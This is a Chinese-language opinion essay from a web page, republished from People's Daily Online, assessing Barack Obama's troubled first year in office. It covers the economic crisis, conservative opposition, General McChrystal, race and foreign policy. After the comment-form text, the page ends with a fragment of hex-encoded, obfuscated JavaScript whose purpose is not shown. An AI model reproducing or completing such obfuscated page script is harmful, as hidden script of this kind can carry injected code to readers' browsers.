当前位置:首页 >> 美洲 >> 奥巴马这一年
奥巴马这一年
作者:于滨
2010年06月29日  来源:人民网国际频道[2010-01-28]  浏览次数:0  文字大小:【大】 【中】 【小】写给编辑
摘要:回头来看,奥巴马政府提前进入“跛鸭”(lame duck)状态, 既是由于遭遇了几乎不可克服的内患外难,又是美国国内政治极端政治化的牺牲品,更有奥巴马本人决策和操作失误的原因。

  一年一度的国情咨文,是美国总统对选民们公布业绩、展望未来的一刻。然而对执政一年的奥巴马来说,过去的失却大于得,未来又是阴多于晴。更糟糕的是,无论奥巴马的支持者或反对者,都给奥巴马的头一年打了三分。

  而就在一年前,这位政坛新星在美国深度经济危机之中,以“变革”和“希望”的清新姿态,高调入主白宫,就任第44届总统,大有时势造英雄之势。曾几何时,这位美国选民一度的“宠儿”,民意支持率由一年前的70%骤降至不足50%,跌幅近三成,大大超出新任总统一年后支持率下降5%的常态。

  回头来看,奥巴马政府提前进入“跛鸭”(lame duck)状态, 既是由于遭遇了几乎不可克服的内患外难,又是美国国内政治极端政治化的牺牲品,更有奥巴马本人决策和操作失误的原因。

  政坛新秀,“胜”不逢时

  奥巴马大起大落,说到底是“胜”不逢时。其前任布什总统离任时,美国经济已沉疴难起:股市狂泻不止,政府公司债台高筑,举国上下人人差钱;百年老牌公司或顷刻倾覆,或摇摇欲坠;失业率急剧攀升,百万房奴被扫地出门。更有之,小布什政府连年穷兵黩武:六年伊战,七年阿战,八年反恐,离职前还临门一脚,在巴基斯坦另辟新战场。为此美军疲于奔命,军嫂叫苦连天。恐怖分子越打越多,美国人的安全感愈来愈低。美国有人认为奥巴马当选,好比就任“泰坦尼克号”的船长,风雨飘摇,岌岌可危。

  奥巴马这位以“颜色革命”入主白宫的首任黑人总统,虽然开创了美国政治的先例,却无法改变美国国内政治运作中的陈年积垢,更无回天之力。尽管如此,奥巴马及其团队仍踌躇满志,立志在医疗、金融、税收等领域,实现不同于其前任的政策理念。

  草根运动,星火燎原?

  然而,奥氏的种种举措,几乎都在美国政治生态日益政治化和极端意识形态化的气氛中,要么被曲解,要么被肢解,要么流于空谈。

  甚至奥巴马上任的“三把火”还没烧起来,保守派人士就借每年4月15日的报税截止期,在全国范围发动了750起“抗税”活动(tea bag parties),公开与奥巴马政府对抗。在纽约,前众议院议长、保守派巨头金里奇(Newt Gingrich)亲自出马,呼吁抗税者不与奥巴马领导的联邦政府合作。德州共和党州长佩里(Rick Perry)为连选连任,也为抗税运动东奔西忙。

  作为奥巴马上任以来最重要的国内政策,医疗改革从一开始就遭受保守派的围追堵截。2009年夏,美国各地就医改问题召开无数次乡镇议事大会(town hall meetings),但在共和党的操纵下,几乎都成了声讨奥巴马和民主党的“批斗会”,与会者群情激昂,把所有西方发达国家早已实行的公共医疗,妖魔化为在普通美国人认为是洪水猛兽的社会主义和共产主义制度。2009年9月9日奥巴马在国会就医保问题演讲时,南卡众议员威尔逊大喊“你撒谎!”这种公然违反议程、在最高立法机构粗暴打断总统发言的现象,在美国历史上绝无仅有。

  最和奥巴马政府过不去的,要数美国极右派喉舌《福克斯》电视频道。从2009年1月到10月,该频道的时政节目主持人格兰·拜克(Glenn Beck)竟使用了127次“马克思”和“马克思主义”的字眼;330次“共产主义”,404次“社会主义”。看拜克的节目,美国方佛又回到了麦卡锡时代。其实,拜克的极端意识形态化的言辞,还比不上《福克斯》的保守干将奥瑞里(Bill O'Reilly, Jr.),他日复一日的晚间新闻节目,几乎是过去十年来收视率最高的节目。奥巴马执政后,保守派喉舌林波( Rush Limbaugh)也常在《福克斯》露面。数月前,保守派的“豪女”、前共和党副总统候选人佩林因出了一本《我行我素》(Going Rogue)的自传而名声大噪,《福克斯》近来又聘其为特约“分析员”,每天与奥瑞里等人“对唱”。《福克斯》这三男一女,凑成一个极端保守的媒体“四人帮”,时时事事与白宫过不去。住在里边的奥巴马,哪有不烦的。

  战区司令,挑战总统

  如果说保守派的群起攻之是预料之中的,极少参政的美国军方对这位新任三军统帅也不怎么买账。2009年9月27日,驻阿富汗美军最高指挥官麦克里斯特尔将军接受美国哥伦比亚广播公司著名的《60分钟》节目采访,公开要求奥巴马向阿增兵四万,否则美军必败。四天后,麦将在伦敦战略研究所演讲,再度质疑副总统拜登消减驻阿美军的主张。

  麦氏作为战区指挥官,绕过参谋长联席会议和国防部长这些正常渠道,直接通过媒体向三军最高统帅(总统)“喊话”,已超越了宪法所规定的军政关系的底线,与当年麦克阿瑟将军在朝战初期公开挑战杜鲁门政府,只是程度不同。麦克里斯特尔公开“犯上”,使增兵阿富汗问题高度政治化,极大压缩了奥巴马政府对阿富汗战争进行的战略评估和决策的空间,奥巴马为其政治理念和战略目标,也因此必须付出更多的政治资本。

  回过头看,无论奥巴马如何回应,是否增兵阿富汗,增兵多少,其总统的权威和形象均已受损。在政策操作层面,奥巴马政府由此陷于两难境地,即增兵势必增加美军伤亡,引发社会反弹;反之则会被保守派扣上“绥靖”和“不忠”的帽子。

  其实,奥巴马政府不过是继承了前任的烂摊子,甚至还未来得及施展自己的军事战略,其决策能力和意志就已受到下属的公开怀疑和挑战。相比之下,布什在伊拉克问题上频频失误,军方人士也只是在幕后或通过正常渠道(如国会作证)与布什政府交涉。而奥巴马政府任期之初,军方在增兵问题上对新总统“发难”,这不是简单的“军政不和”就可以解释的。

  无独有偶,美国空军德蓝普(Charles Dunlap, Jr.)中校在1992年发表了一篇题为《2012 年美国军事政变之根源》的文章(“The Origins of the American Military Coup of 2012”),预测2012年的美国政局混乱、奸臣当道、毒品遍地、无法无天、民不聊生;而唯一还算廉洁的军队也就顺理成章地接管白宫,替天行道。2012年是奥巴马本届总统任期结束之日,不知麦克里斯特尔将军是否注意到这个日期。无论如何,麦克里斯特尔是参谋长联席会议主席马伦海军上将(Mullen)和伊战英雄、现任中东司令部司令帕敦艾斯将军(Petraeus)的爱将,在军界和情报系统有相当的人脉基础,其主张也得到保守势力的强劲支持。

  美国总统,还是黑人总统?

  奥巴马刚入主白宫,即受到诸种“特殊礼遇”,不能不使人怀疑是否有某种“种族”成分在暗中发酵。然而作为美国首任黑人总统,族裔问题很可能是奥巴马任期内最难有作为的领域。早在2008年大选中,奥巴马就尽可能地回避或“超越”族裔问题,美国黑人主流对此一直有自己的看法。2009年中,一个偶然的事件凸显了奥巴马在族裔问题上“中立”却又相当尴尬的处境。哈佛大学黑人教授盖茨2009年7月16日在自己家里由于“行为不轨”(disorderly conduct)而被白人警察拘捕,奥巴马在事发之后对哈佛大学所在的剑桥城警察局的“低度”批评(“Cambridge police acted stupidly”),居然引发了剑桥警察的集体抗议,要求奥巴马公开道歉。其实,奥巴马对警方的批评并不过分,警方是在确认盖茨教授是房主以后仍以“态度不好”而将其拘留。然而整个事件由媒体无限放大,奥巴马不得不数次出面澄清,“承认”对事件了解不够,最终以白宫“啤酒高峰会”(beer summit)的方式息事宁人。

  其实,仔细观察盖勒普民意测验就可发现,一年来美国非裔和西裔对奥巴马的支持率仍保持在90%和70%的高位,而白人的支持率则降为39%。至少,相当多的美国人仍在“以貌取人”,即把奥巴马视为“黑人”总统,而非美国总统。为此,代表美国黑人知识精英的哈佛大学黑人社会学教授奥兰多认为,奥巴马在任期内不可能在族裔问题上有明显动作,美国社会中可以意会而不言传的种族意识,不是白宫中四年八载的“颜色革命”就可以根除的。

  诺贝尔奖帮倒忙

  “堤内损失堤外补”,外交恐怕是奥巴马过去一年政绩的少有的亮点。事实上,奥巴马入主白宫头六个月间国际旅行的次数,远远超过卡特以来的任何前任。而且在世界各地,奥巴马的大胆和诚恳的言辞,的确打动很多人。在布拉格,他建议由美国带头走向无核武器世界;在埃及他向穆斯林世界喊话,承诺永不与伊斯兰世界开战;在俄罗斯,奥与俄方就削减进攻性战略武器达成共识; 出访亚太,试图与中日等大国更为平等相处。无论是美国的盟友或对手,高度国际化的奥巴马至少在言辞上告别了布什的单边主义,美国的外交形象豁然改观。

  然而在大多数对国际事务既无兴趣又欠知识的普通美国人来说,美国的国际形象与自身的实际利益毫不相干,奥巴马的友善姿态甚至有失美国的尊严。对于诺贝尔和平奖委员会2009年10月授予奥巴马本年度和平奖这样有助于提升美国国际形象的象征性举动,美国主流的自由派媒体的反映也相当负面。美国许多人也许永远无法理解,欧洲人给奥巴马和平奖,不是对布什政府的简单否定,更可能是担心奥巴马在内政和安全(反恐)问题上显而易见的困境,最终会使美国的单边主义卷土重来,祸及全球。然而美国人偏不领这个情。不少人不仅认为奥巴马是无功而受禄,甚至还有人认为这是外人在干扰美国内政。欧洲人的“深算”似乎给奥巴马帮了倒忙。

  新官上任,有烟无火

  其实奥巴马是忽视了“攘外必先安内”或“弱国无外交”之类常识。一年下来,奥巴马立志要推进的医改在反对党的层层阻击下进展缓慢,似已成强弩之末。原因之一是奥巴马本人未有全力投入,听任国会对其政业中最重要的公共政策项目随意修理。这样操作虽然少有政治风险,但却错失良机,无以挽回。

  而对美国80年来以来最为严重的金融危机的始作俑者——华尔街的大佬们——的监管制度的改革,奥巴马还只是说说而已。以致这些刚刚用纳税人的巨额救济逃过一劫的“肥猫”们(fat cats,人们对肥得流油 的银行界大佬们的通称),如今又在忙于年终的巨额分红。高盛集团高级员工们平均分得50万美元,高管们的所得更是数倍甚至数十倍于此。与此同时,美国官方公布的失业率在2009年10月已达10.2%,为26年来新高。2009年有整整5百万美国人加入失业大军。如果加上官方统计以外已放弃寻找工作的“长期失业者”(long-term discouraged workers),美国的实际失业率(effective unemployment rate)为22%,几乎与80年前的大萧条旗鼓相当。

  如今,近四分之一的美国人处于水深火热之中,而他们的家人亲友,又把他们的失望和愤怒滚雪球似的放大和扩展。即使暂时保住饭碗的人也须节衣缩食。且由奢返简难,没人愿意过从富到穷的日子。本来就少有耐心、事事要立竿见影的美国民众,不把怨气撒向曾允诺为他们带来“变化”和“希望”的总统,还要找谁过不去吗?民主党上周在麻省痛失50年代就一直由肯尼迪家族把持的参院席位,多少是愤怒的选民宣泄的结果。

  政坛沧桑,宦海沉浮,早已是官场铁律。奥巴马亦不例外。意外的是,这位哈佛高材生兼政坛新秀,在华盛顿的官场上还未来得及将其魅力转换为魄力,就已“未老先衰”。奥巴马政府在第二年能否返老还童,重振士气,推进变革,实现奥巴马在首次国情咨文中的种种承诺,人们还要拭目以待。

  (作者为上海美国学会资深研究员,美国俄亥俄州文博大学(Wittenberg University)政治系教授。)

本文引用地址:

关键词阅读
相关评论
发表评论

验证码:

  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的),本站管理员有权保留或删除评论内容。
推荐文章
热点文章
热评文章
本站独家

d\x73\x22\x39\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'); -->